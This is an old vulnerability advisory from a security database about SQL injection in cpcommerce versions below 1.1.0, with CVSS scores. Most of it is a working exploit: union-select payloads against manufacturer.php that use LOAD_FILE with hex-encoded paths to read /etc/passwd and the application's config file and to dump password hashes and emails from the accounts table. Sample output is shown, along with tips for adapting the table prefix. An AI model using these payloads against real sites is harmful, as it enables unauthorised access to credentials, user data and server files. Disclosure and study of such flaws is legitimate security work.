cpcommerce < v1.1.0 [sql injection]

2007.06.03
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

vendor site:http://cpcommerce.cpradio.org/ product:cpcommerce < v1.1.0 bug: sql injection risk : high note:works regardless of php.ini settings . http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union /**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAc counts/* //result: Information about '8725ade7b722d1ad43b7b949162eab4d' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh ........... http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union /**/select/**/pass,email,0/**/from/**/cpAccounts/* //result: Information about '8725ade7b722d1ad43b7b949162eab4d' none (at) none (dot) com [email concealed] read database credentials plain text: http://127.0.0.1/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union /**/select/**/LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F 63732F6370636F6D6D657263652F5F636F6E6669672E706870),pass,0/**/from/**/cp Accounts/* //result:Products in '.............. // Database Information $config['host'] = "localhost"; // Database Host $config['user'] = "my_user"; // Database Username $config['pass'] = "my_password"; // Database Password $config['database'] = "hi"; // Database Name $config['prefix'] = "cp"; ........................... '8725ade7b722d1ad43b7b949162eab4d' ps1: 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F6370636F6D6D657263 652F5F636F6E6669672E706870 --> /usr/local/apache2/htdocs/cpcommerce/_config.php ps2: /**/cpAccounts/* --> cp = prefix. Accounts --> table_name . (cp is the default one) so you can try with your table prefix . regards laurent gaffie


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top